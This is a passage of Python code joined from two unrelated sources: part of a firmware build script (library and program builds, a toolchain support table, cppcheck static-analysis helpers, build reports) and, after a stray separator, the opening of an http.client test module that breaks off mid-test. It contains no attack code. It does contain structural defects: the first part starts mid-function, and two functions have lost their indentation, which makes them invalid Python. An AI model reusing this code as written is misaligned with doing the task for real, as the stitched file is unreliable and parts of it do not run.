    unique_src_paths = []
    for path in src_paths:
        if path not in unique_src_paths:
            unique_src_paths.append(path)
    src_paths = unique_src_paths

    PROJECT_BASENAME = basename(src_paths[0])

    if name is None:
        # We will use default project name based on project folder name
        name = PROJECT_BASENAME
        toolchain.info("Building project %s (%s, %s)" % (PROJECT_BASENAME.upper(), target.name, toolchain_name))
    else:
        # User used custom global project name to have the same name for the
        toolchain.info("Building project %s to %s (%s, %s)" % (PROJECT_BASENAME.upper(), name, target.name, toolchain_name))

    # Scan src_path and libraries_paths for resources
    resources = toolchain.scan_resources(src_paths[0])
    for path in src_paths[1:]:
        resources.add(toolchain.scan_resources(path))
    if libraries_paths is not None:
        # Library paths are compiled together with the project sources below.
        src_paths.extend(libraries_paths)
        for path in libraries_paths:
            resources.add(toolchain.scan_resources(path))

    if linker_script is not None:
        resources.linker_script = linker_script

    # Build Directory
    if clean:
        if exists(build_path):
            rmtree(build_path)
    mkdir(build_path)

    # We need to add if necessary additional include directories
    if inc_dirs:
        if type(inc_dirs) == ListType:
            resources.inc_dirs.extend(inc_dirs)
        else:
            resources.inc_dirs.append(inc_dirs)

    # Compile Sources: each path is scanned separately but compiled with the
    # aggregated include path list so cross-path headers resolve.
    for path in src_paths:
        src = toolchain.scan_resources(path)
        objects = toolchain.compile_sources(src, build_path, resources.inc_dirs)
        resources.objects.extend(objects)

    # Link Program
    return toolchain.link_program(resources, build_path, name)
def build_library(src_paths, build_path, target, toolchain_name,
        dependencies_paths=None, options=None, name=None, clean=False,
        notify=None, verbose=False, macros=None, inc_dirs=None, inc_dirs_ext=None, jobs=1, silent=False):
    """ src_path: the path of the source directory
    build_path: the path of the build directory
    target: ['LPC1768', 'LPC11U24', 'LPC2368']
    toolchain: ['ARM', 'uARM', 'GCC_ARM', 'GCC_CS', 'GCC_CR']
    library_paths: List of paths to additional libraries
    name: library name; defaults to the first source folder's name
    clean: Rebuild everything if True
    notify: Notify function for logs
    verbose: Write the actual tools command lines if True
    inc_dirs: additional include directories which should be included in build
    inc_dirs_ext: additional include directories which should be copied to library directory
    """
    if type(src_paths) != ListType:
        src_paths = [src_paths]

    for src_path in src_paths:
        if not exists(src_path):
            # BUGFIX: use %-interpolation -- passing src_path as a second
            # Exception argument never substituted it into the message.
            raise Exception("The library source folder does not exist: %s" % src_path)

    # Toolchain instance
    toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
    toolchain.VERBOSE = verbose
    toolchain.jobs = jobs
    toolchain.build_all = clean

    if name is None:
        # BUGFIX: the 'name' parameter used to be unconditionally
        # overwritten; honour it when the caller provides one.
        # The first path will give the name to the library.
        name = basename(src_paths[0])
    toolchain.info("Building library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))

    # Scan Resources
    resources = []
    for src_path in src_paths:
        resources.append(toolchain.scan_resources(src_path))

    # Add extra include directories / files which are required by library
    # This files usually are not in the same directory as source files so
    # previous scan will not include them
    if inc_dirs_ext is not None:
        for inc_ext in inc_dirs_ext:
            resources.append(toolchain.scan_resources(inc_ext))

    # Dependencies Include Paths
    dependencies_include_dir = []
    if dependencies_paths is not None:
        for path in dependencies_paths:
            lib_resources = toolchain.scan_resources(path)
            dependencies_include_dir.extend(lib_resources.inc_dirs)

    if inc_dirs:
        dependencies_include_dir.extend(inc_dirs)

    # Create the desired build directory structure
    bin_path = join(build_path, toolchain.obj_path)
    mkdir(bin_path)
    tmp_path = join(build_path, '.temp', toolchain.obj_path)
    mkdir(tmp_path)

    # Copy Headers
    for resource in resources:
        toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
    dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)

    # Compile Sources
    objects = []
    for resource in resources:
        objects.extend(toolchain.compile_sources(resource, tmp_path, dependencies_include_dir))

    toolchain.build_library(objects, bin_path, name)
def build_lib(lib_id, target, toolchain, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
""" Wrapper for build_library function.
Function builds library in proper directory using all dependencies and macros defined by user.
"""
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
# We need to combine macros from parameter list with macros from library definition
MACROS = lib.macros if lib.macros else []
if macros:
MACROS.extend(macros)
build_library(lib.source_dir, lib.build_dir, target, toolchain, lib.dependencies, options,
verbose=verbose,
silent=silent,
clean=clean,
macros=MACROS,
notify=notify,
inc_dirs=lib.inc_dirs,
inc_dirs_ext=lib.inc_dirs_ext,
jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s' % (lib_id, target.name, toolchain)
# We do have unique legacy conventions about how we build and package the mbed library
def build_mbed_libs(target, toolchain_name, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
    """ Function returns True is library was built and false if building was skipped

    Builds CMSIS and the mbed library for one (target, toolchain) pair into
    the MBED_LIBRARIES tree, following the legacy TARGET_/TOOLCHAIN_ layout.
    """
    # Check toolchain support
    if toolchain_name not in target.supported_toolchains:
        supported_toolchains_text = ", ".join(target.supported_toolchains)
        print '%s target is not yet supported by toolchain %s' % (target.name, toolchain_name)
        print '%s target supports %s toolchain%s' % (target.name, supported_toolchains_text, 's' if len(target.supported_toolchains) > 1 else '')
        return False

    # Toolchain
    toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
    toolchain.VERBOSE = verbose
    toolchain.jobs = jobs
    toolchain.build_all = clean

    # Source and Build Paths
    BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
    BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
    mkdir(BUILD_TOOLCHAIN)

    TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
    mkdir(TMP_PATH)

    # CMSIS: headers go to the target dir; linker scripts, binaries and
    # compiled objects go to the toolchain-specific dir.
    toolchain.info("Building library %s (%s, %s)"% ('CMSIS', target.name, toolchain_name))
    cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
    resources = toolchain.scan_resources(cmsis_src)

    toolchain.copy_files(resources.headers, BUILD_TARGET)
    toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)
    toolchain.copy_files(resources.bin_files, BUILD_TOOLCHAIN)

    objects = toolchain.compile_sources(resources, TMP_PATH)
    toolchain.copy_files(objects, BUILD_TOOLCHAIN)

    # mbed
    toolchain.info("Building library %s (%s, %s)" % ('MBED', target.name, toolchain_name))

    # Common Headers
    toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
    toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)

    # Target specific sources
    HAL_SRC = join(MBED_TARGETS_PATH, "hal")
    hal_implementation = toolchain.scan_resources(HAL_SRC)
    toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files + hal_implementation.libraries, BUILD_TARGET, HAL_SRC)
    incdirs = toolchain.scan_resources(BUILD_TARGET).inc_dirs
    objects = toolchain.compile_sources(hal_implementation, TMP_PATH, [MBED_LIBRARIES] + incdirs)

    # Common Sources
    mbed_resources = toolchain.scan_resources(MBED_COMMON)
    objects += toolchain.compile_sources(mbed_resources, TMP_PATH, [MBED_LIBRARIES] + incdirs)

    # A number of compiled files need to be copied as objects as opposed to
    # being part of the mbed library, for reasons that have to do with the way
    # the linker search for symbols in archives. These are:
    #   - retarget.o: to make sure that the C standard lib symbols get overridden
    #   - board.o: mbed_die is weak
    #   - mbed_overrides.o: this contains platform overrides of various weak SDK functions
    separate_names, separate_objects = ['retarget.o', 'board.o', 'mbed_overrides.o'], []

    for o in objects:
        for name in separate_names:
            if o.endswith(name):
                separate_objects.append(o)

    # Remove the standalone objects from the archive input, then archive the
    # rest and copy the standalone objects next to the archive.
    for o in separate_objects:
        objects.remove(o)

    toolchain.build_library(objects, BUILD_TOOLCHAIN, "mbed")

    for o in separate_objects:
        toolchain.copy_files(o, BUILD_TOOLCHAIN)
    return True
def get_unique_supported_toolchains():
    """ Get list of all unique toolchains supported by targets """
    seen = []
    for target_name in TARGET_NAMES:
        for tc in TARGET_MAP[target_name].supported_toolchains:
            if tc not in seen:
                seen.append(tc)
    return seen
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None):
    """ Shows target map using prettytable

    verbose_html: render the table as HTML instead of plain text
    platform_filter: optional regex; only matching platform names are listed
    Returns the rendered table followed by a legend and summary counters.
    """
    unique_supported_toolchains = get_unique_supported_toolchains()
    from prettytable import PrettyTable # Only use it in this function so building works without extra modules

    # All tests status table print
    columns = ["Platform"] + unique_supported_toolchains
    # Reuse 'columns' instead of rebuilding the same list (was duplicated).
    pt = PrettyTable(columns)
    # Align table
    for col in columns:
        pt.align[col] = "c"
    pt.align["Platform"] = "l"

    perm_counter = 0    # supported (platform, toolchain) combinations
    target_counter = 0  # platforms actually listed
    for target in sorted(TARGET_NAMES):
        if platform_filter is not None:
            # Filter out platforms using regex
            if re.search(platform_filter, target) is None:
                continue
        target_counter += 1

        row = [target]  # First column is platform name
        default_toolchain = TARGET_MAP[target].default_toolchain
        for unique_toolchain in unique_supported_toolchains:
            text = "-"
            if default_toolchain == unique_toolchain:
                text = "Default"
                perm_counter += 1
            elif unique_toolchain in TARGET_MAP[target].supported_toolchains:
                text = "Supported"
                perm_counter += 1
            row.append(text)
        pt.add_row(row)

    result = pt.get_html_string() if verbose_html else pt.get_string()
    result += "\n"
    result += "*Default - default on-line compiler\n"
    result += "*Supported - supported off-line compiler\n"
    result += "\n"
    result += "Total platforms: %d\n"% (target_counter)
    result += "Total permutations: %d"% (perm_counter)
    return result
def get_target_supported_toolchains(target):
    """ Returns target supported toolchains list """
    if target in TARGET_MAP:
        return TARGET_MAP[target].supported_toolchains
    return None
def static_analysis_scan(target, toolchain_name, CPPCHECK_CMD, CPPCHECK_MSG_FORMAT, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
    """ Run cppcheck static analysis over the CMSIS and mbed sources for one
    (target, toolchain) pair.

    CPPCHECK_CMD: base cppcheck command line (list)
    CPPCHECK_MSG_FORMAT: extra cppcheck message-format arguments (list)
    Results are printed to stdout/stderr when verbose is True.
    """
    # Toolchain
    toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
    toolchain.VERBOSE = verbose
    toolchain.jobs = jobs
    toolchain.build_all = clean

    # Source and Build Paths
    BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
    BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
    mkdir(BUILD_TOOLCHAIN)

    TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
    mkdir(TMP_PATH)

    # CMSIS
    toolchain.info("Static analysis for %s (%s, %s)" % ('CMSIS', target.name, toolchain_name))
    cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
    resources = toolchain.scan_resources(cmsis_src)

    # Copy files before analysis
    toolchain.copy_files(resources.headers, BUILD_TARGET)
    toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)

    # Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
    includes = ["-I%s"% i for i in resources.inc_dirs]
    includes.append("-I%s"% str(BUILD_TARGET))
    c_sources = " ".join(resources.c_sources)
    cpp_sources = " ".join(resources.cpp_sources)
    macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]

    includes = map(str.strip, includes)
    macros = map(str.strip, macros)

    check_cmd = CPPCHECK_CMD
    check_cmd += CPPCHECK_MSG_FORMAT
    check_cmd += includes
    check_cmd += macros

    # We need to pass some params via file to avoid "command line too long in some OSs"
    tmp_file = tempfile.NamedTemporaryFile(delete=False)
    tmp_file.writelines(line + '\n' for line in c_sources.split())
    tmp_file.writelines(line + '\n' for line in cpp_sources.split())
    tmp_file.close()
    check_cmd += ["--file-list=%s"% tmp_file.name]

    _stdout, _stderr, _rc = run_cmd(check_cmd)
    if verbose:
        print _stdout
        print _stderr

    # =========================================================================

    # MBED
    toolchain.info("Static analysis for %s (%s, %s)" % ('MBED', target.name, toolchain_name))

    # Common Headers
    toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
    toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)

    # Target specific sources
    HAL_SRC = join(MBED_TARGETS_PATH, "hal")
    hal_implementation = toolchain.scan_resources(HAL_SRC)

    # Copy files before analysis
    toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files, BUILD_TARGET, HAL_SRC)
    # NOTE(review): 'incdirs' here is a full resource scan of BUILD_TARGET,
    # not just include dirs -- its c/cpp source lists are used below too.
    incdirs = toolchain.scan_resources(BUILD_TARGET)

    target_includes = ["-I%s" % i for i in incdirs.inc_dirs]
    target_includes.append("-I%s"% str(BUILD_TARGET))
    target_includes.append("-I%s"% str(HAL_SRC))
    target_c_sources = " ".join(incdirs.c_sources)
    target_cpp_sources = " ".join(incdirs.cpp_sources)
    target_macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]

    # Common Sources
    mbed_resources = toolchain.scan_resources(MBED_COMMON)

    # Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
    mbed_includes = ["-I%s" % i for i in mbed_resources.inc_dirs]
    mbed_includes.append("-I%s"% str(BUILD_TARGET))
    mbed_includes.append("-I%s"% str(MBED_COMMON))
    mbed_includes.append("-I%s"% str(MBED_API))
    mbed_includes.append("-I%s"% str(MBED_HAL))
    mbed_c_sources = " ".join(mbed_resources.c_sources)
    mbed_cpp_sources = " ".join(mbed_resources.cpp_sources)

    target_includes = map(str.strip, target_includes)
    mbed_includes = map(str.strip, mbed_includes)
    target_macros = map(str.strip, target_macros)

    check_cmd = CPPCHECK_CMD
    check_cmd += CPPCHECK_MSG_FORMAT
    check_cmd += target_includes
    check_cmd += mbed_includes
    check_cmd += target_macros

    # We need to pass some parames via file to avoid "command line too long in some OSs"
    tmp_file = tempfile.NamedTemporaryFile(delete=False)
    tmp_file.writelines(line + '\n' for line in target_c_sources.split())
    tmp_file.writelines(line + '\n' for line in target_cpp_sources.split())
    tmp_file.writelines(line + '\n' for line in mbed_c_sources.split())
    tmp_file.writelines(line + '\n' for line in mbed_cpp_sources.split())
    tmp_file.close()
    check_cmd += ["--file-list=%s"% tmp_file.name]

    _stdout, _stderr, _rc = run_cmd_ext(check_cmd)
    if verbose:
        print _stdout
        print _stderr
def static_analysis_scan_lib(lib_id, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
static_analysis_scan_library(lib.source_dir, lib.build_dir, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
lib.dependencies, options,
verbose=verbose, clean=clean, macros=macros, notify=notify, jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s'% (lib_id, target.name, toolchain)
def static_analysis_scan_library(src_paths, build_path, target, toolchain_name, cppcheck_cmd, cppcheck_msg_format,
                                 dependencies_paths=None, options=None, name=None, clean=False,
                                 notify=None, verbose=False, macros=None, jobs=1):
    """ Function scans library (or just some set of sources/headers) for staticly detectable defects

    src_paths: source path (string) or list of source paths to scan
    build_path: directory where headers are copied before the scan
    cppcheck_cmd / cppcheck_msg_format: base cppcheck command and
        message-format arguments (lists)
    NOTE(review): the 'clean' parameter is accepted but never used here.
    """
    if type(src_paths) != ListType:
        src_paths = [src_paths]

    for src_path in src_paths:
        if not exists(src_path):
            # NOTE(review): src_path is passed as a second Exception argument,
            # so the %s is never interpolated into the message.
            raise Exception("The library source folder does not exist: %s", src_path)

    # Toolchain instance
    toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
    toolchain.VERBOSE = verbose
    toolchain.jobs = jobs

    # The first path will give the name to the library
    name = basename(src_paths[0])
    toolchain.info("Static analysis for library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))

    # Scan Resources
    resources = []
    for src_path in src_paths:
        resources.append(toolchain.scan_resources(src_path))

    # Dependencies Include Paths
    dependencies_include_dir = []
    if dependencies_paths is not None:
        for path in dependencies_paths:
            lib_resources = toolchain.scan_resources(path)
            dependencies_include_dir.extend(lib_resources.inc_dirs)

    # Create the desired build directory structure
    bin_path = join(build_path, toolchain.obj_path)
    mkdir(bin_path)
    tmp_path = join(build_path, '.temp', toolchain.obj_path)
    mkdir(tmp_path)

    # Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
    includes = ["-I%s" % i for i in dependencies_include_dir + src_paths]
    c_sources = " "
    cpp_sources = " "
    macros = ['-D%s' % s for s in toolchain.get_symbols() + toolchain.macros]

    # Copy Headers
    for resource in resources:
        toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
        includes += ["-I%s" % i for i in resource.inc_dirs]
        c_sources += " ".join(resource.c_sources) + " "
        cpp_sources += " ".join(resource.cpp_sources) + " "

    dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)

    includes = map(str.strip, includes)
    macros = map(str.strip, macros)

    check_cmd = cppcheck_cmd
    check_cmd += cppcheck_msg_format
    check_cmd += includes
    check_cmd += macros

    # We need to pass some parameters via file to avoid "command line too long in some OSs"
    # Temporary file is created to store e.g. cppcheck list of files for command line
    tmp_file = tempfile.NamedTemporaryFile(delete=False)
    tmp_file.writelines(line + '\n' for line in c_sources.split())
    tmp_file.writelines(line + '\n' for line in cpp_sources.split())
    tmp_file.close()
    check_cmd += ["--file-list=%s"% tmp_file.name]

    # This will allow us to grab result from both stdio and stderr outputs (so we can show them)
    # We assume static code analysis tool is outputting defects on STDERR
    _stdout, _stderr, _rc = run_cmd_ext(check_cmd)
    if verbose:
        print _stdout
        print _stderr
def print_build_results(result_list, build_name):
    """ Generate result string for build results

    Returns '<build_name>\\n * item\\n * item\\n' for a non-empty list,
    or the empty string when there is nothing to report.
    """
    if not result_list:
        return ""
    bullet_lines = [" * %s" % item for item in result_list]
    return build_name + "\n" + "\n".join(bullet_lines) + "\n"
def write_build_report(build_report, template_filename, filename):
    """Render build reports through a Jinja2 template into `filename`.

    Reports with at least one failing entry go to `failing_builds`,
    the rest to `passing_builds`.
    """
    failing = [report for report in build_report if len(report["failing"]) > 0]
    passing = [report for report in build_report if len(report["failing"]) == 0]

    env = Environment(extensions=['jinja2.ext.with_'])
    env.loader = FileSystemLoader('ci_templates')
    template = env.get_template(template_filename)

    with open(filename, 'w+') as f:
        f.write(template.render(failing_builds=failing, passing_builds=passing))
| |
"""
Tests for the http.client module
Adapted for the python-future module from the Python 2.7 standard library
tests. The adaptations are to cope with the unicode_literals syntax.
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from future import standard_library
from future.builtins import *
from future import utils
from future.tests.base import unittest
from http import client
import array
import io
import socket
import errno
TestCase = unittest.TestCase
from test import support
HOST = support.HOST
class FakeSocket(object):
    """In-memory socket stand-in: serves canned response text via makefile()
    and records everything passed to sendall() in ``self.data``."""

    def __init__(self, text, fileclass=io.BytesIO):
        # Canned response text is always stored as bytes.
        if isinstance(text, type(u'')):  # i.e. unicode string
            text = text.encode('ascii')
        self.text = text
        self.fileclass = fileclass
        self.data = bytes(b'')

    def sendall(self, data):
        olddata = self.data
        assert isinstance(olddata, type(b''))  # i.e. native string type. FIXME!
        if utils.PY3:
            self.data += data
            return
        # Py2: normalize the various possible payload types to a byte string.
        if isinstance(data, type(u'')):  # i.e. unicode
            chunk = data.encode('ascii')
        elif isinstance(data, type(b'')):  # native string type. FIXME!
            chunk = bytes(data)
        elif isinstance(data, bytes):
            chunk = data
        elif isinstance(data, array.array):
            chunk = data.tostring()
        else:
            chunk = bytes(b'').join(chr(d) for d in data)
        self.data += chunk

    def makefile(self, mode, bufsize=None):
        # Only read modes are supported; the canned text is replayed.
        if mode not in ('r', 'rb'):
            raise client.UnimplementedFileMode()
        return self.fileclass(self.text)
class EPipeSocket(FakeSocket):
    """FakeSocket that simulates a broken pipe: sendall() raises EPIPE as
    soon as the configured trigger byte string appears in the payload."""

    def __init__(self, text, pipe_trigger):
        # When sendall() is called with pipe_trigger, raise EPIPE.
        FakeSocket.__init__(self, text)
        self.pipe_trigger = pipe_trigger

    def sendall(self, data):
        if self.pipe_trigger not in data:
            self.data += data
        else:
            raise socket.error(errno.EPIPE, "gotcha")

    def close(self):
        # Nothing to release for the fake socket.
        pass
class NoEOFStringIO(io.BytesIO):
    """Like StringIO, but raises AssertionError on EOF.

    This is used below to test that http.client doesn't try to read
    more from the underlying file than it should.
    """

    def read(self, n=-1):
        chunk = super(NoEOFStringIO, self).read(n)
        if chunk == b'':
            raise AssertionError('caller tried to read past EOF')
        return chunk

    def readline(self, length=None):
        line = super(NoEOFStringIO, self).readline(length)
        if line == b'':
            raise AssertionError('caller tried to read past EOF')
        return line
class HeaderTests(TestCase):
    """Tests for header generation on outgoing requests (no real network)."""

    def test_auto_headers(self):
        # Some headers are added automatically, but should not be added by
        # .request() if they are explicitly set.

        class HeaderCountingBuffer(list):
            # Stand-in for HTTPConnection._buffer that counts how many
            # times each header key gets appended.
            def __init__(self):
                self.count = {}
            def append(self, item):
                kv = item.split(b':')
                if len(kv) > 1:
                    # item is a 'Key: Value' header string
                    lcKey = kv[0].decode('ascii').lower()
                    self.count.setdefault(lcKey, 0)
                    self.count[lcKey] += 1
                list.append(self, item)

        for explicit_header in True, False:
            for header in 'Content-length', 'Host', 'Accept-encoding':
                conn = client.HTTPConnection('example.com')
                conn.sock = FakeSocket('blahblahblah')
                conn._buffer = HeaderCountingBuffer()

                body = 'spamspamspam'
                headers = {}
                if explicit_header:
                    headers[header] = str(len(body))
                conn.request('POST', '/', body, headers)
                # Whether supplied explicitly or generated automatically,
                # each header must appear exactly once.
                self.assertEqual(conn._buffer.count[header.lower()], 1)

    def test_content_length_0(self):

        class ContentLengthChecker(list):
            # Records the value of any Content-Length header appended to
            # the connection's output buffer.
            def __init__(self):
                list.__init__(self)
                self.content_length = None
            def append(self, item):
                kv = item.split(b':', 1)
                if len(kv) > 1 and kv[0].lower() == b'content-length':
                    self.content_length = kv[1].strip()
                list.append(self, item)

        # POST with empty body
        conn = client.HTTPConnection('example.com')
        conn.sock = FakeSocket(None)
        conn._buffer = ContentLengthChecker()
        conn.request('POST', '/', '')
        self.assertEqual(conn._buffer.content_length, b'0',
                         'Header Content-Length not set')

        # PUT request with empty body
        conn = client.HTTPConnection('example.com')
        conn.sock = FakeSocket(None)
        conn._buffer = ContentLengthChecker()
        conn.request('PUT', '/', '')
        self.assertEqual(conn._buffer.content_length, b'0',
                         'Header Content-Length not set')

    def test_putheader(self):
        # putheader() must serialize a non-string (int) header value.
        conn = client.HTTPConnection('example.com')
        conn.sock = FakeSocket(None)
        conn.putrequest('GET','/')
        conn.putheader('Content-length', 42)
        self.assertTrue(b'Content-length: 42' in conn._buffer)

    def test_ipv6host_header(self):
        # Default host header on IPv6 transaction should be wrapped in [] if
        # it is an actual IPv6 address
        expected = bytes(b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n') + \
                   bytes(b'Accept-Encoding: identity\r\n\r\n')
        conn = client.HTTPConnection('[2001::]:81')
        sock = FakeSocket('')
        conn.sock = sock
        conn.request('GET', '/foo')
        self.assertTrue(sock.data.startswith(expected))

        expected = bytes(b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n') + \
                   bytes(b'Accept-Encoding: identity\r\n\r\n')
        conn = client.HTTPConnection('[2001:102A::]')
        sock = FakeSocket('')
        conn.sock = sock
        conn.request('GET', '/foo')
        self.assertTrue(sock.data.startswith(expected))
class BasicTest(TestCase):
    """Core HTTPResponse/HTTPConnection behavior against FakeSocket."""

    def test_status_lines(self):
        # Test HTTP status lines
        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(), b'Text')
        self.assertTrue(resp.isclosed())

        # A malformed (non-integer) status code must raise BadStatusLine.
        body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        self.assertRaises(client.BadStatusLine, resp.begin)

    def test_bad_status_repr(self):
        # The repr differs between Py2 (u'' prefix) and Py3.
        exc = client.BadStatusLine('')
        if not utils.PY3:
            self.assertEqual(repr(exc), '''BadStatusLine("u\'\'",)''')
        else:
            self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')

    def test_partial_reads(self):
        # if we have a length, the system knows when to close itself
        # same behaviour than when we read the whole thing with read()
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(bytes(resp.read(2)), b'Te')
        self.assertFalse(resp.isclosed())
        self.assertEqual(bytes(resp.read(2)), b'xt')
        self.assertTrue(resp.isclosed())

    def test_partial_reads_no_content_length(self):
        # when no length is present, the socket should be gracefully closed when
        # all data was read
        body = "HTTP/1.1 200 Ok\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(2), b'Te')
        self.assertFalse(resp.isclosed())
        self.assertEqual(resp.read(2), b'xt')
        self.assertEqual(resp.read(1), b'')
        self.assertTrue(resp.isclosed())

    def test_partial_reads_incomplete_body(self):
        # if the server shuts down the connection before the whole
        # content-length is delivered, the socket is gracefully closed
        body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
        sock = FakeSocket(body)
        resp = client.HTTPResponse(sock)
        resp.begin()
        self.assertEqual(resp.read(2), b'Te')
        self.assertFalse(resp.isclosed())
        self.assertEqual(resp.read(2), b'xt')
        self.assertEqual(resp.read(1), b'')
        self.assertTrue(resp.isclosed())

    def test_host_port(self):
        # Check invalid host_port
        # Note that http.client does not accept user:password@ in the host-port.
        for hp in ("www.python.org:abc", "user:password@www.python.org"):
            self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)

        # Valid host-port forms, including bracketed IPv6 and default port 80.
        for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
                          8000),
                         ("www.python.org:80", "www.python.org", 80),
                         ("www.python.org", "www.python.org", 80),
                         ("www.python.org:", "www.python.org", 80),
                         ("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80)):
            c = client.HTTPConnection(hp)
            self.assertEqual(h, c.host)
            self.assertEqual(p, c.port)

    def test_response_headers(self):
        # test response with multiple message headers with the same field name.
        text = ('HTTP/1.1 200 OK\r\n'
                'Set-Cookie: Customer="WILE_E_COYOTE";'
                ' Version="1"; Path="/acme"\r\n'
                'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
                ' Path="/acme"\r\n'
                '\r\n'
                'No body\r\n')
        # Duplicate headers are joined with ", ".
        hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
               ', '
               'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
        s = FakeSocket(text)
        r = client.HTTPResponse(s)
        r.begin()
        cookies = r.getheader("Set-Cookie")
        self.assertEqual(cookies, hdr)

    def test_read_head(self):
        # Test that the library doesn't attempt to read any data
        # from a HEAD request.  (Tickles SF bug #622042.)
        # NoEOFStringIO raises if http.client over-reads the body.
        sock = FakeSocket(
            'HTTP/1.1 200 OK\r\n'
            'Content-Length: 14432\r\n'
            '\r\n',
            NoEOFStringIO)
        resp = client.HTTPResponse(sock, method="HEAD")
        resp.begin()
        if resp.read():
            self.fail("Did not expect response from HEAD request")

    def test_send_file(self):
        expected = (bytes(b'GET /foo HTTP/1.1\r\nHost: example.com\r\n') +
                    bytes(b'Accept-Encoding: identity\r\nContent-Length:'))

        # __file__ will usually be the .pyc, i.e. binary data
        with open(__file__, 'rb') as body:
            conn = client.HTTPConnection('example.com')
            sock = FakeSocket(body)
            conn.sock = sock
            conn.request('GET', '/foo', body)
            self.assertTrue(sock.data.startswith(expected), '%r != %r' %
                            (sock.data[:len(expected)], expected))

    def test_send(self):
        # send() must accept bytes, array.array, and file-like objects.
        expected = bytes(b'this is a test this is only a test')
        conn = client.HTTPConnection('example.com')
        sock = FakeSocket(None)
        conn.sock = sock
        conn.send(expected)
        self.assertEqual(expected, sock.data)
        sock.data = bytes(b'')
        if utils.PY3:
            mydata = array.array('b', expected)
        else:
            mydata = array.array(b'b', expected)
        conn.send(mydata)
        self.assertEqual(expected, sock.data)
        sock.data = bytes(b'')
        conn.send(io.BytesIO(expected))
        self.assertEqual(expected, sock.data)

    def test_chunked(self):
        # 'hello world' split across two chunks of sizes 0xa and 0x1.
        chunked_start = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            'a\r\n'
            'hello worl\r\n'
            '1\r\n'
            'd\r\n'
        )
        sock = FakeSocket(chunked_start + '0\r\n')
        resp = client.HTTPResponse(sock, method="GET")
        resp.begin()
        self.assertEqual(resp.read(), b'hello world')
        resp.close()

        # Missing or malformed terminating chunk -> IncompleteRead.
        for x in ('', 'foo\r\n'):
            sock = FakeSocket(chunked_start + x)
            resp = client.HTTPResponse(sock, method="GET")
            resp.begin()
            try:
                resp.read()
            except client.IncompleteRead as i:
                self.assertEqual(i.partial, b'hello world')
                self.assertEqual(repr(i),'IncompleteRead(11 bytes read)')
                self.assertEqual(str(i),'IncompleteRead(11 bytes read)')
            else:
                self.fail('IncompleteRead expected')
            finally:
                resp.close()

    def test_chunked_head(self):
        # A chunked HEAD response must yield no body but keep status/reason.
        chunked_start = (
            'HTTP/1.1 200 OK\r\n'
            'Transfer-Encoding: chunked\r\n\r\n'
            'a\r\n'
